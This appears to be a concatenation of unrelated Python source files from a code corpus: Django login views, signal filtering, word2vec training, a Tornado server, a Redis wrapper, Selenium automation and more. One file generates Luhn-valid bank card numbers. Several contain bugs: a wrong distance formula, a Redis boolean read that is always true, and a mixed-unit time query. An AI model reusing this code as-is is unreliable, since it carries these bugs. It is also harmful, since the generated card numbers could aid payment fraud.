    url(r'^reset-password$', password_reset, name='reset_password'),
    url(r'^reset_password_done$', password_reset_done, name='password_reset')
]
|
994,973 | 2087f6e89b2aebb028bb78c7cb83812d40ed0fa6 | n = int(input())
# Print n-2 when it is positive, otherwise 1 (floor of 1 on the output).
# NOTE(review): problem context not visible in SOURCE; presumably a
# contest answer -- confirm against the original statement.
if n > 2:
    print(n-2)
else:
    print(1)
994,974 | 904fbee2f4e53994fc86bd6f3847398dd1d3c0bb | # -*- coding: utf-8 -*-
"""
Created on Thu Sep 10 17:43:15 2020
@author: figonpiot
"""
# filtracja cyfrowa (DSP)
from matplotlib.pyplot import subplots, plot, xscale, xlim, show, close
from scipy.signal import firwin, chirp, lfilter
from numpy import linspace,pi,random
# Test signal: 0-1 s linear chirp (10 Hz -> 350 Hz) plus white Gaussian noise.
t = linspace(0,1,8001)
x = chirp(t,10,1,350,method='linear') + random.randn(8001)
# 32-tap FIR low-pass filter, cutoff at 0.1 of the Nyquist frequency.
b = firwin(32,0.1)
y = lfilter(b,1,x)
close()
# Basic plot settings: raw signal in red, filtered signal in black,
# x-axis zoomed to the first 0.5 s.
ax1 = plot(t,x,color='r')
ax2 = plot(t,y,color='k')
xscale("linear")
left, right = xlim()
xlim(left=0,right=0.5)
|
994,975 | 6428acd75d91e6225a1bc8664e116ba32e00d0de | import configparser
import requests
import sys
from os import path
def read_config():
    """
    Read a config file from ``$HOME/.profrc``

    We expect a file of the following form

    [DEFAULT]
    Baseurl = https://your-prof-instance
    Login = username

    Exits the process when no baseurl is configured or the configured
    baseurl is unreachable; otherwise returns the parsed ConfigParser.
    """
    filename = path.join(path.expanduser('~'), '.profrc')
    config = configparser.ConfigParser()
    config.read(filename)
    # ConfigParser option names are case-insensitive, so 'Baseurl' in the
    # file is looked up here as 'baseurl'.
    if 'baseurl' not in config['DEFAULT']:
        print("""FATAL : No baseurl found in {0}
Open {0} and add the following lines
[DEFAULT]
Baseurl = https://your-prof-instance""".format(filename))
        sys.exit()
    try:
        requests.get(config['DEFAULT']['BASEURL'])
    # BUG FIX: the original bare ``except:`` also swallowed SystemExit and
    # KeyboardInterrupt; catching Exception keeps the best-effort
    # reachability check while letting interpreter signals propagate.
    except Exception:
        print("{0} does not seems to be reachable. Verify the baseurl set at {1} matches ``https://your-prof-instance``".format(config['DEFAULT']['BASEURL'], filename))
        sys.exit()
    return config
def set_sessid(sessid):
    """
    Save this current sessid in ``$HOME/.profrc``
    """
    # Re-read the existing file first so every other setting survives the
    # rewrite; only DEFAULT.Session is updated.
    filename = path.join(path.expanduser('~'), '.profrc')
    config = configparser.ConfigParser()
    config.read(filename)
    config.set('DEFAULT', 'Session', sessid)
    with open(filename, 'w') as configfile:
        print("write a new sessid")
        config.write(configfile)
|
994,976 | f101f8bd842d6d1d299a87a42f7a9a904a913a21 | # -*- coding:utf-8 -*-
# 定义多点坐标_绘出折线_并计算起始点和终点距离
import turtle
import math
# 定义多个点的坐标
x1,y1 = 100,100
x2,y2 = 100,-100
x3,y3 = -100,-100
x4,y4 = -100,100
# 绘制折线
turtle.penup()
turtle.goto(x1,y1)
turtle.pendown()
turtle.goto(x2,y2)
turtle.goto(x3,y3)
turtle.goto(x4,y4)
# 计算起始点和终点的距离
distance = math.sqrt((x1-x4)**2 * (y1-y4)**2)
turtle.write(distance)
|
994,977 | 1fe507cd8e5bd247528f902c37d2e50731d2302f | import random
def luhn_check_digit(body):
    """Return the Luhn check digit (0-9) for the numeric string ``body``.

    Appending the returned digit makes the full number pass the standard
    Luhn (mod-10) validation used by payment-card numbers.
    """
    total = 0
    for pos, ch in enumerate(reversed(body)):
        digit = int(ch)
        # Once the check digit is appended, these digits sit in even
        # positions counted from the right and must be doubled.
        if pos % 2 == 0:
            digit *= 2
            # BUG FIX: the original tested ``> 10``, so a doubled 5 kept
            # the value 10 instead of folding to 1; any doubled value of
            # 10 or more folds back to one digit by subtracting 9.
            if digit >= 10:
                digit -= 9
        total += digit
    # BUG FIX: the original position loops used range(..., 0, -2) and so
    # never counted the first digit of the card body, producing numbers
    # that fail real Luhn validation.
    return (10 - total % 10) % 10


# Generate five 19-digit card numbers: a fixed issuer prefix, five random
# digits, and a trailing Luhn check digit.
for count in range(5):
    id_prefix = '6245647845412'  # define the card id, 15 digit number
    id_suffix = random.randint(10000, 99999)  # random number for 16-18
    bankid = id_prefix + str(id_suffix)  # connect the prefix and suffix
    bankid = bankid + str(luhn_check_digit(bankid))
    print(bankid)
|
994,978 | 3906a490b319ba6cf3867c91af26f946d38bbab6 | from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.contrib.auth import logout,login,authenticate
from django.contrib.auth.forms import UserCreationForm
# Create your views here.
def logout_view(request):
    # Log the current user out, then redirect to the Learning Log home page.
    logout(request)
    return HttpResponseRedirect(reverse('learning_logs:index'))
def register(request):
    """Register a new user, log them in, and redirect to the home page."""
    if request.method !='POST':
        # GET: show a blank registration form.
        form = UserCreationForm()
    else:
        # POST: process the completed form.
        form = UserCreationForm(data=request.POST)
        if form.is_valid():
            new_user = form.save()
            # Authenticate with the just-saved credentials so login() can
            # attach the user to the session, then redirect home.
            authenticated_user = authenticate(username=new_user.username,password = request.POST['password1'])
            login(request,authenticated_user)
            return HttpResponseRedirect(reverse('learning_logs:index'))
    context = {'form':form}
    return render(request,'users/register.html',context)
|
994,979 | f28986fea7d05b3d0184c1f955244c8b89165bce | import collections
import itertools
from copy import deepcopy
from gensim.models.word2vec import Word2Vec
from gensim.models.callbacks import CallbackAny2Vec
from ray import tune
from recsys.data import (
load_recsys15,
load_aotm,
load_ecomm,
train_test_split
)
from recsys.metrics import recall_at_k, mrr_at_k
from recsys.utils import absolute_filename
MODEL_DIR = "output/models/"
def train_w2v(train_data, params:dict, callbacks=None, model_name=None):
    """Train (or continue training) a gensim Word2Vec model and return its vectors.

    Parameters
    ----------
    train_data : iterable of token lists used as the training corpus.
    params : dict of keyword arguments for the Word2Vec constructor.
    callbacks : optional list of gensim callback instances.
    model_name : optional path; when given, the model is loaded from disk
        for additional training instead of being constructed from `params`.

    Returns
    -------
    The trained model's word vectors (``model.wv``).
    """
    if model_name:
        # Load a model for additional training.
        model = Word2Vec.load(model_name)
    else:
        # train model
        if callbacks:
            model = Word2Vec(callbacks=callbacks, **params)
        else:
            model = Word2Vec(**params)
    # NOTE(review): build_vocab() also runs for a *loaded* model, rebuilding
    # its vocabulary from train_data -- confirm this is intended for the
    # continued-training path.
    model.build_vocab(train_data)
    model.train(train_data, total_examples=model.corpus_count, epochs=model.epochs, compute_loss=True)
    vectors = model.wv
    return vectors
def tune_w2v(config):
    """Ray Tune trainable: train Word2Vec with `config` and report Recall@k.

    `config` must contain 'dataset' ('recsys15' | 'aotm' | 'ecomm') and 'k';
    every remaining key is forwarded to the Word2Vec constructor.
    """
    # load data
    if config['dataset'] == 'recsys15':
        sessions = load_recsys15()
    elif config['dataset'] == 'aotm':
        sessions = load_aotm()
    elif config['dataset'] == 'ecomm':
        sessions = load_ecomm()
    else:
        print(f"{config['dataset']} is not a valid dataset name. Please choose from recsys15, aotm or ecomm")
        return
    train, test, valid = train_test_split(sessions, test_size=1000)
    # The logger reports Recall@k to Ray Tune after every epoch.
    ratk_logger = RecallAtKLogger(valid, k=config['k'], ray_tune=True)
    # remove keys from config that aren't hyperparameters of word2vec
    config.pop('dataset')
    config.pop('k')
    train_w2v(train, params=config, callbacks=[ratk_logger])
class RecallAtKLogger(CallbackAny2Vec):
    '''Report Recall@K at each epoch'''
    def __init__(self, validation_set, k, ray_tune=False, save_model=False):
        self.epoch = 0
        self.recall_scores = []   # per-epoch scores (only kept when not using Ray Tune)
        self.validation = validation_set
        self.k = k
        self.tune = ray_tune      # when True, report to Ray Tune instead of printing
        self.save = save_model    # when True, checkpoint the model every 10 epochs
    def on_epoch_begin(self, model):
        if not self.tune:
            print(f'Epoch: {self.epoch}', end='\t')
    def on_epoch_end(self, model):
        # method 1: deepcopy the model and set the model copy's wv to None
        # so evaluation does not mutate the model still being trained.
        mod = deepcopy(model)
        mod.wv.norms = None # will cause it recalculate norms?
        # Every 10 epochs, save the model
        if self.epoch%10 == 0 and self.save:
            # method 2: save and reload the. model
            model.save(absolute_filename(f"{MODEL_DIR}w2v_{self.epoch}.model"))
            #mod = Word2Vec.load(f"w2v_{self.epoch}.model")
        ratk_score = recall_at_k(self.validation, mod.wv, self.k)
        if self.tune:
            tune.report(recall_at_k = ratk_score)
        else:
            self.recall_scores.append(ratk_score)
            # NOTE(review): the label always says Recall@10 even when k != 10.
            print(f' Recall@10: {ratk_score}')
        self.epoch += 1
class LossLogger(CallbackAny2Vec):
    """Track per-epoch training loss.

    Word2Vec's get_latest_training_loss() reports a cumulative figure that
    grows every epoch, so the previous total is subtracted to recover the
    loss incurred during the epoch that just finished.
    """
    def __init__(self):
        self.epoch = 0
        self.previous_loss = 0
        self.training_loss = []
    def on_epoch_end(self, model):
        cumulative = model.get_latest_training_loss()
        epoch_loss = cumulative - self.previous_loss
        self.previous_loss = cumulative
        self.training_loss.append(epoch_loss)
        print(f' Loss: {epoch_loss}')
        self.epoch += 1
def association_rules_baseline(train_sessions):
    """Build an item co-occurrence table from training sessions.

    For every ordered pair of distinct items appearing in the same session,
    the second item is appended to the first item's list. Counting the
    duplicates in those lists yields each item's most frequent companions,
    which serve as baseline recommendations.
    These recommendations must be evaluated using the "_baseline"
    recall/mrr functions in metrics.py.
    """
    cooccurrences = collections.defaultdict(list)
    for basket in train_sessions:
        for left, right in itertools.permutations(basket, 2):
            cooccurrences[left].append(right)
    return cooccurrences
994,980 | 4df87e95368fbe3e8bdd3e3b70db46aecf6ef905 | """
File to keep basic view classes (for instance for ajax requests, etc.)
"""
from django.http import JsonResponse, HttpResponseBadRequest, Http404
from establishment.funnel.encoder import StreamJSONEncoder
class HTTPRenderer(object):
    # Placeholder whose rendering callables are attached at runtime
    # (render_error_message / render_single_page_app are assigned below).
    pass
global_renderer = HTTPRenderer()
def default_render_error_message(request, title, message):
    # Default no-op renderer; projects are expected to replace it on
    # global_renderer with a real implementation.
    pass
def default_single_page_app(request):
    # Default no-op single-page-app renderer.
    pass
global_renderer.render_error_message = default_render_error_message
global_renderer.render_single_page_app = default_single_page_app
def get_remote_ip(request):
    """
    Return the client IP for a request, as filled in by apache/nginx.

    Prefers HTTP_REMOTE_ADDR (the webserver-provided REMOTE_ADDR as Django
    names it) and falls back to REMOTE_ADDR, then to an empty string.
    You don't normally want to use this directly -- wrap requests in a
    middleware that fills in request.ip instead, and only trust values
    your webserver fills in.
    """
    meta = request.META
    return meta.get("HTTP_REMOTE_ADDR", meta.get("REMOTE_ADDR", ""))
class JSONResponse(JsonResponse):
    # JsonResponse that serializes with the project's StreamJSONEncoder by default.
    def __init__(self, data, cls=StreamJSONEncoder, **kwargs):
        super().__init__(data, cls, **kwargs)
def login_required(function=None):
    """Decorator requiring an authenticated user.

    AJAX requests receive the USER_NOT_AUTHENTICATED error payload; normal
    requests get a rendered "please login" page. Usable both bare
    (@login_required) and called (@login_required()).
    """
    def _decorator(view_func):
        def _wrapped_view(request, *args, **kwargs):
            if not request.user.is_authenticated:
                if request.is_ajax():
                    # Imported lazily to avoid a circular import at module load.
                    from establishment.errors.errors import BaseError
                    return BaseError.USER_NOT_AUTHENTICATED
                return global_renderer.render_error_message(request, "Please login", "You need to login to continue."
                                                                                    "You can login from the navbar (upper right corner)")
            return view_func(request, *args, **kwargs)
        return _wrapped_view
    if function is None:
        return _decorator
    else:
        return _decorator(function)
def superuser_required(function=None):
    """Decorator requiring a superuser: AJAX gets NOT_ALLOWED, others get 404."""
    def _decorator(view_func):
        def _wrapped_view(request, *args, **kwargs):
            if not request.user.is_superuser:
                if request.is_ajax():
                    # Imported lazily to avoid a circular import at module load.
                    from establishment.errors.errors import BaseError
                    return BaseError.NOT_ALLOWED
                raise Http404()
            return view_func(request, *args, **kwargs)
        return _wrapped_view
    if function is None:
        return _decorator
    else:
        return _decorator(function)
def login_required_ajax(function=None):
    """
    Just make sure the user is authenticated to access a certain ajax view
    """
    def _decorator(view_func):
        def _wrapped_view(request, *args, **kwargs):
            # Reject non-AJAX requests outright, then require authentication.
            if not request.is_ajax():
                return HttpResponseBadRequest()
            if not request.user.is_authenticated:
                from establishment.errors.errors import BaseError
                return BaseError.USER_NOT_AUTHENTICATED
            return view_func(request, *args, **kwargs)
        return _wrapped_view
    if function is None:
        return _decorator
    else:
        return _decorator(function)
def ajax_required(function=None):
    """Decorator rejecting non-AJAX requests with 400 Bad Request."""
    def _decorator(view_func):
        def _wrapped_view(request, *args, **kwargs):
            if not request.is_ajax():
                return HttpResponseBadRequest()
            return view_func(request, *args, **kwargs)
        return _wrapped_view
    if function is None:
        return _decorator
    else:
        return _decorator(function)
def single_page_app(function=None):
    """Decorator serving the single-page-app shell for non-AJAX requests.

    AJAX requests fall through to the wrapped view. Usable both bare
    (@single_page_app) and called (@single_page_app()).
    """
    # BUG FIX / consistency: every sibling decorator in this module declares
    # ``function=None``; this one omitted the default, which made the
    # ``function is None`` branch unreachable and ``@single_page_app()``
    # raise TypeError.
    def _decorator(view_func):
        def _wrapped_view(request, *args, **kwargs):
            if not request.is_ajax():
                return global_renderer.render_single_page_app(request)
            return view_func(request, *args, **kwargs)
        return _wrapped_view
    if function is None:
        return _decorator
    else:
        return _decorator(function)
994,981 | ea6fe88f439c48f966d3b79e0c19019bc0825f21 | import math_func
import pytest
import sys # used to demonstrate the skipif decorator
# sys give us the python version
"""
Add decorator "mark" before each test to allow us run a specific group of tests
Here we have two marks: number and strings
pytest test_math_func.py -v -m number #runs only test_add and test_prod
"""
"""
The option "-x" in the pytest command means "exit on first failure":
as soon as the first failure occurs in your tests, pytest stops
executing the remaining tests.
"""
"""
The option --tb=no disables the traceback output: only minimal information appears when a test fails
"""
"""
The option --maxfail=NUM waits until the given maximum number of failures is reached and then exits
"""
"""
The option -rsx shows the reason of skip
"""
@pytest.mark.number
#@pytest.mark.skip(reason="do not run number add test") # to not run this test
#@pytest.mark.skipif(sys.version_info < (3, 3), reason="do not run number add test") #This only skip if python version is low than 3.3
def test_add():
    # math_func.add defaults its second argument to 2.
    assert math_func.add(7, 3) == 10
    assert math_func.add(7) == 9
    assert math_func.add(5) == 7
@pytest.mark.number
def test_prod():
    # math_func.prod defaults its second argument to 2.
    assert math_func.prod(5, 5) == 25
    assert math_func.prod(5) == 10
    assert math_func.prod(7) == 14
    # assert math_func.prod(7) == 9 # the test will fails and with the option -x the test procedure will exit
# to test -x and --maxfail
@pytest.mark.strings
def test_add_strings():
    # add() concatenates when given two strings.
    result = math_func.add('Hello', ' World')
    assert result == 'Hello World'
    assert type(result) is str
    assert 'Heldlo' not in result
@pytest.mark.strings
def test_prod_strings():
    # prod() repeats a string; the multiplier defaults to 2.
    assert math_func.prod('Hello ', 3) == 'Hello Hello Hello '
    result = math_func.prod('Hello ')
    assert result == 'Hello Hello '
    assert type(result) is str
    assert 'Hello' in result
|
994,982 | 21d1b1be811d37e9b3fedd1d8962d0a6f57567ce | import hashlib
# Demonstrate one-way hashing of a plaintext string with MD5.
# NOTE(review): MD5 is cryptographically broken; use hashlib.sha256 or a
# dedicated password KDF (bcrypt/scrypt/PBKDF2) for anything security-sensitive.
# BUG FIX (idiom): the original bound the plaintext to the name ``str``,
# shadowing the builtin type; renamed to ``plaintext``.
plaintext = '111111'
# Create an md5 hash object, feed it the UTF-8 encoded text, and print
# the hexadecimal digest.
digest = hashlib.md5()
digest.update(plaintext.encode('utf-8'))
print(digest.hexdigest())
|
994,983 | 0988400ebdcd3945ef6628200f3e1dd739d6983f | import logging
import time
import random
import tornado.ioloop
import tornado.httpserver
import tornado.httpclient
import tornado.options
import tornado.web
import redis
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
logging.basicConfig(format='%(levelname)s - %(filename)s:L%(lineno)d pid=%(process)d - %(message)s')
logger = logging.getLogger('agent')
# Client for the local Redis instance (used by the /resource/lock handler).
redis_cli = redis.StrictRedis()
# Pre-generated random alphanumeric payloads: 1 MiB and 1 KiB.
big_random = "".join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
                      for i in range(1024 * 1024)])
medium_random = "".join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
                         for i in range(1024)])
# NOTE(review): 'autorestart' is not a standard Tornado application setting
# ('autoreload' is) -- confirm which was intended.
TORNADO_SETTINGS = {'debug': True, 'autorestart': True}
class API(tornado.web.RequestHandler):
    # Common base class for this service's request handlers.
    pass
class BigNetwork(API):
    """Stream the pre-generated 1 MiB payload in fixed-size chunks."""
    async def get(self):
        i = 0
        page = 1024 * 1024 # 1MB chunk size
        # BUG FIX: the original sliced big_random[i*page:(i+1)*page] while
        # also advancing i by `page`, so every slice after the first was
        # empty (and the loop still spun len/page times). Slice by byte
        # offset instead.
        while i < len(big_random):
            self.write(big_random[i:i + page])
            i += page
            self.flush()
        self.finish()
class MediumNetwork(API):
    # Serve the pre-generated 1 KiB payload in a single write.
    async def get(self):
        self.write(medium_random) # 1KB
        self.finish()
class Lock(API):
    # Deliberately blocking endpoint: holds a Redis lock for 0.5 s on the
    # IOLoop thread to simulate lock contention.
    def get(self):
        with redis_cli.lock('block'):
            time.sleep(0.5) # We want this to block. That is the point.
        self.write('done')
        self.finish()
def get_app():
    """Build the Tornado application with the resource-simulation routes."""
    return tornado.web.Application([
        (r"/resource/network/big", BigNetwork),
        (r"/resource/network/medium", MediumNetwork),
        (r"/resource/lock", Lock),
    ], **TORNADO_SETTINGS)
def main():
    """Parse options, start the HTTP server, and run the IOLoop forever."""
    loop = tornado.ioloop.IOLoop.current()
    tornado.options.parse_command_line()
    server = tornado.httpserver.HTTPServer(get_app())
    server.listen(options.port)
    server.start()
    logger.info("Server listening on port %s", options.port)
    loop.start()
# Run the server only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
|
994,984 | 629acc1cd929c14cd8abf8409cfbe3fe6a8e05b5 | from django.shortcuts import render, HttpResponse, redirect
from .models import User
from django.contrib import messages
import bcrypt
# Create your views here.
def index(request):
    """Render the landing page."""
    # BUG FIX: the module previously defined ``index`` twice; the first
    # definition (returning HttpResponse("vuelve")) was dead code, silently
    # shadowed by this one. Removing it leaves module behavior unchanged.
    return render(request, "index.html")
def register(request):
    """Create a user from the POSTed form, log them in, and redirect."""
    print(request.POST)
    validationErrors = User.objects.registrationValidator(request.POST)
    print(validationErrors)
    if len(validationErrors) > 0:
        # Flash every validation error and bounce back to the form.
        for key, value in validationErrors.items():
            messages.error(request, value)
        return redirect("/")
    else:
        # Hash the password with a per-user salt before storing it.
        hashedPw = bcrypt.hashpw(request.POST['pw'].encode(), bcrypt.gensalt()).decode()
        newuser = User.objects.create(first_name=request.POST['fname'], last_name=request.POST['lname'],
                                      email=request.POST['email'], password=hashedPw)
        print(newuser)
        # Mark the new user as logged in for this session.
        request.session['loggedinid'] = newuser.id
        return redirect("/success")
def success(request):
    """Show the logged-in user's page; redirect anonymous visitors home."""
    if 'loggedinid' not in request.session:
        return redirect("/")
    loggedinuser = User.objects.get(id=request.session['loggedinid'])
    context = {
        'loggedinuser': loggedinuser
    }
    return render(request, "success.html", context)
def logout(request):
    # Drop all session data (including 'loggedinid') and return home.
    request.session.clear()
    return redirect("/")
def login(request):
    """Validate login credentials and start a session on success."""
    print(request.POST)
    validation_errors = User.objects.loginValidator(request.POST)
    print(validation_errors)
    if len(validation_errors) > 0:
        for key, value in validation_errors.items():
            messages.error(request, value)
        return redirect("/")
    else:
        # NOTE(review): this assumes loginValidator already verified the
        # bcrypt password and that a user with this email exists -- confirm,
        # otherwise this logs in on a bad password or raises IndexError.
        user = User.objects.filter(email=request.POST['email'])[0]
        request.session['loggedinid'] = user.id
        return redirect('/success')
|
994,985 | c9aae5138ea1fe970a424bad21c3955553f1e463 | import pandas as pandas
import numpy as numpy
import yfinance as yf
import datetime as dt
from pandas_datareader import data as pdr
# Route pandas_datareader's Yahoo Finance calls through yfinance.
yf.pdr_override()
stock=input("Enter a stock ticker symbol: ")
print(stock)
# Download daily data from 2019-01-01 through today.
startyear=2019
startmonth=1
startday=1
start=dt.datetime(startyear,startmonth,startday)
now=dt.datetime.now()
df=pdr.get_data_yahoo(stock,start,now)
print(df)
# 50-day simple moving average of column 4 (Adjusted Close).
ma=50
smaString="Sma_"+str(ma)
df[smaString]=df.iloc[:,4].rolling(window=ma).mean()
print(df)
# Drop the warm-up rows where the rolling mean is still NaN.
df=df.iloc[ma:]
print(df)
#Access data from AdjustedClose and sma
#for i in df.index:
#    print("Adjusted Close: " + str(df["Adj Close"][1]))
#    print(smaString + ": " + str(df[smaString][1]))
# Count days that closed above (numH) vs. below/at (numC) the moving average.
numH=0
numC=0
for i in df.index:
    if(df["Adj Close"][i]>df[smaString][i]):
        print("The Close is higher")
        numH+=1
    else:
        print("The Close is lower")
        numC+=1
print(str(numH))
print(str(numC))
|
994,986 | 2774661464568e010658241946a3ba74f8e29bb6 | from project import socketio
from project import app
import os
# Run with debug enabled unless the ENV variable marks production.
debug = True
if os.environ.get("ENV") == "production":
    debug=False
if __name__ == "__main__":
    socketio.run(app, debug=debug)
994,987 | 7c42efea22fc640841df5e6e88d7003b26e47386 | from __future__ import division
from collections import Counter
from utils import get_dset, get_test, pprint_word
def get_tagged_vocab(dset):
    """Vocabulary of tokens whose mask flag ('ii') is set, over all sentences."""
    vocab = set()
    for sent in dset:
        for word, masked in zip(sent['ws'], sent['ii']):
            if masked:
                vocab.add(word)
    return vocab
def get_vocab(dset):
    """Vocabulary of every token appearing anywhere in the dataset."""
    return {word for sent in dset for word in sent['ws']}
def get_contexts(sent, c):
    """Return the c-word context window around each masked position.

    The sentence is padded with c '<s>' / '</s>' sentinels on each side;
    for every position whose 'ii' flag is set, the c words to the left,
    a '___' placeholder, and the c words to the right are joined with
    single spaces.
    """
    padded = (['<s>'] * c) + sent['ws'] + (['</s>'] * c)
    windows = []
    for pos, masked in enumerate(sent['ii']):
        if not masked:
            continue
        center = pos + c
        window = padded[center - c:center] + ['___'] + padded[center + 1:center + c + 1]
        windows.append(' '.join(window))
    return windows
if __name__ == '__main__':
    # Python 2 script body: vocabulary-overlap and frequency statistics
    # comparing the training set with the test set.
    trn = get_dset()
    tst = get_test()
    print map(len, map(get_tagged_vocab, [trn,tst]))
    print 'tagged vocab size trn {} tst {}'.format(*map(len, map(get_tagged_vocab, [trn,tst])))
    print 'all vocab size trn {} tst {}'.format(*map(len, map(get_vocab, [trn,tst])))
    # Fraction of (tagged / all) test vocabulary unseen during training.
    vtrn, vtst = map(get_tagged_vocab, [trn,tst])
    print 'tagged vtst diff: {:.2f}'.format( len(vtst.difference(vtrn)) / len(vtst) )
    vtrn, vtst = map(get_vocab, [trn,tst])
    print 'all vtst diff: {:.2f}'.format( len(vtst.difference(vtrn)) / len(vtst) )
    # Most frequent 3- and 4-character affixes of positively-labelled words.
    precnt = Counter(w[:j] for sent in trn for w, lbl in zip(sent['ws'],sent['ls']) for j in range(3,5) if lbl==1 and len(w)>j)
    sufcnt = Counter(w[-j:] for sent in trn for w, lbl in zip(sent['ws'],sent['ls']) for j in range(3,5) if lbl==1 and len(w)>j)
    print 'most common prefixes:', precnt.most_common(100)
    print 'most common suffixes:', sufcnt.most_common(100)
    # Share of tagged tokens that occur more than once in each split.
    trn_tagged_wcounts = Counter(w for sent in trn for w, lbl, m in zip(sent['ws'],sent['ls'],sent['ii']) if m)
    print 'perc of words appers 1+ in trn:', sum(c for w,c in trn_tagged_wcounts.iteritems() if c > 1) / sum(c for w,c in trn_tagged_wcounts.iteritems())
    tst_tagged_wcounts = Counter(w for sent in tst for w, lbl, m in zip(sent['ws'],sent['ls'],sent['ii']) if m)
    print 'most common tst_tagged_wcounts:', tst_tagged_wcounts.most_common(100)
    print 'perc of words appers 1+ in tst:', sum(c for w,c in tst_tagged_wcounts.iteritems() if c > 1) / sum(c for w,c in tst_tagged_wcounts.iteritems())
    # Most frequent one-word contexts around tagged positions.
    context_counts = Counter(context for sent in trn for context in get_contexts(sent, 1))
    print 'most common contexts in trn:', context_counts.most_common(100)
    context_counts = Counter(context for sent in tst for context in get_contexts(sent, 1))
    print 'most common contexts in tst:', context_counts.most_common(100)
994,988 | 208fc1e8d46da72357639d180d4adeaf139231a0 | # -*- coding: utf-8 -*-
import shutil
import os
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
def donwload(arquivo):
    # NOTE(review): the name is a typo of "download" -- kept so any existing
    # callers keep working.
    """Submit the molecule file `arquivo` (located in ./testes) to the
    LigParGen web service via Selenium and request the TOP output."""
    # arq = 'C:\\caminho\\testes\\'+ arquivo
    diretorio = u'{}/{}'.format(os.getcwd(),'testes')
    arq = u'{}/{}'.format(diretorio,arquivo)
    # driver = webdriver.Chrome()
    driver = webdriver.Firefox()
    driver.implicitly_wait(30)
    driver.get('http://zarbi.chem.yale.edu/ligpargen/index.html')
    #driver.find_element_by_id("exampleMOLFile").click()
    driver.find_element_by_id("exampleMOLFile").clear()
    driver.find_element_by_id("exampleMOLFile").send_keys(arq)
    # Click the submit button that follows the "Molecule charge" label.
    driver.find_element_by_xpath(
        "(.//*[normalize-space(text()) and normalize-space(.)='Molecule charge'])[1]/following::button[1]"
    ).click()
    #driver.find_element_by_xpath("//input[@type='submit' and @value='something']").click()
    driver.find_element_by_xpath("//input[@type='submit' and @value='TOP']").click()
    driver.implicitly_wait(50)
def inicio():
    """Prepare per-molecule working directories for each .pdb file found in
    ./testes, seed placeholder .itp files, and move the downloaded .itp
    results into ./Destino."""
    diretorio = os.getcwd()
    # pasta = u'{}/{}'.format(diretorio,'molecula.pdb')
    # pasta = os.listdir("C:\\caminho\\testes")
    # if not os.path.exists("testes"):
    #     os.makedirs("testes")
    pasta = os.listdir("testes")
    dir_testes = u'{}/{}'.format(os.getcwd(),'testes')
    arquivos = [arq for arq in pasta if os.path.isfile(os.path.join(dir_testes, arq))]
    # print(arquivos)
    pdb = [arq for arq in arquivos if arq.lower().endswith(".pdb")]
    # print(pdb)
    # print (len(pdb))
    # Recreate 'testar' from scratch with one subdirectory per molecule.
    if not os.path.exists('testar'):
        os.makedirs('testar')
    else:
        os.system('rm -Rf testar/')
        os.makedirs('testar')
    for b in pdb:
        # donwload(b)
        dir = b.split(".")[0]
        os.makedirs(u'{}/{}'.format('testar',dir))
    # print(os.listdir("testar"))
    # Recreate 'Downloads' and seed it with placeholder .itp files.
    if not os.path.exists('Downloads'):
        os.makedirs('Downloads')
    else:
        os.system('rm -Rf Downloads/')
        os.makedirs('Downloads')
    for i in range(1,5):
        arquivo = u'Arquivo{}.itp'.format(i)
        os.system(u'touch Downloads/{}'.format(arquivo))
    a = os.listdir("Downloads")
    dir_testes = u'{}/{}'.format(os.getcwd(),'Downloads')
    ar = [arq for arq in a if os.path.isfile(os.path.join(dir_testes, arq))]
    jpgs = [art for art in ar if art.lower().endswith(".itp")]
    # Recreate the destination directory and move the .itp files there.
    if not os.path.exists('Destino'):
        os.makedirs('Destino')
    else:
        os.system('rm -Rf Destino/')
        os.makedirs('Destino')
    '''Coloque o caminho completo abaixo'''
    # (Translation: put the full absolute source path below.)
    # NOTE(review): this moves from the *user's* Downloads folder, not the
    # local ./Downloads created above -- confirm which is intended.
    origem = '/home/luxu/Área de Trabalho/Downloads/'
    [shutil.move(origem+j,'Destino') for j in jpgs]
    print(os.listdir("Destino"))
inicio()
|
994,989 | 1950d79935bb43abd9984ed9576551eb22f5142a | import json
import time
import redis
from Data import TemperatureLog
class Database:
    """Singleton wrapper around a local Redis instance holding fan state,
    temperature logs/thresholds, and a simple item store."""
    instance = None
    @classmethod
    def getInstance(cls):
        # Lazily create the shared instance on first access.
        if Database.instance is None:
            Database.instance = cls()
        return Database.instance
    def __init__(self):
        self.database = redis.StrictRedis(host='localhost', port=6379, db=0)
    def logTemp(self, log: TemperatureLog.TemperatureLog):
        # Sorted set 'temp_log': member = temperature string, score = timestamp.
        # NOTE(review): equal temperature values collapse to one member and
        # keep only the latest timestamp -- confirm this is acceptable.
        self.database.zadd('temp_log', {str(log.tempCelsius): log.timestamp})
    def getLast24HoursTemps(self) -> [TemperatureLog.TemperatureLog]:
        oneDayMs = 24 * 60 * 60 * 1000
        # NOTE(review): time.time() is in *seconds* while oneDayMs is in
        # milliseconds, and zrange() takes rank indexes rather than scores;
        # zrangebyscore with consistent units looks intended -- verify.
        upperBound = int(time.time())
        lowerBound = upperBound - oneDayMs
        rawData = self.database.zrange('temp_log', lowerBound, upperBound, withscores=True)
        return [TemperatureLog.TemperatureLog(float(data[0]), data[1]) for data in rawData]
    def setFanState(self, fansOn: bool):
        # Stored as the string 'True' / 'False'.
        self.database.set('fan_state', str(fansOn))
    # whether or not the fans are running
    def getFanState(self) -> bool:
        # NOTE(review): Redis returns bytes (b'True'/b'False') and any
        # non-empty bytes value is truthy, so this is True whenever the key
        # exists; compare against b'True' to recover the stored boolean.
        return bool(self.database.get('fan_state'))
    # ms between temperature checks
    def getTempRefreshTime(self) -> int:
        return self.database.get('temp_refresh') or 180000
    def setTempRefreshTime(self, timeMs: int):
        self.database.set('temp_refresh', timeMs)
    def setUpperTemp(self, tempCelsius: float):
        self.database.set('temp_upper', tempCelsius)
    def setLowerTemp(self, tempCelsius: float):
        self.database.set('temp_lower', tempCelsius)
    # celsius upper threshold
    def getUpperTemp(self) -> float:
        # NOTE(review): raises TypeError when the key is unset
        # (float(None)); the `or` default only applies to a stored 0.0.
        return float(self.database.get('temp_upper')) or 26.0
    # celsius lower threshold
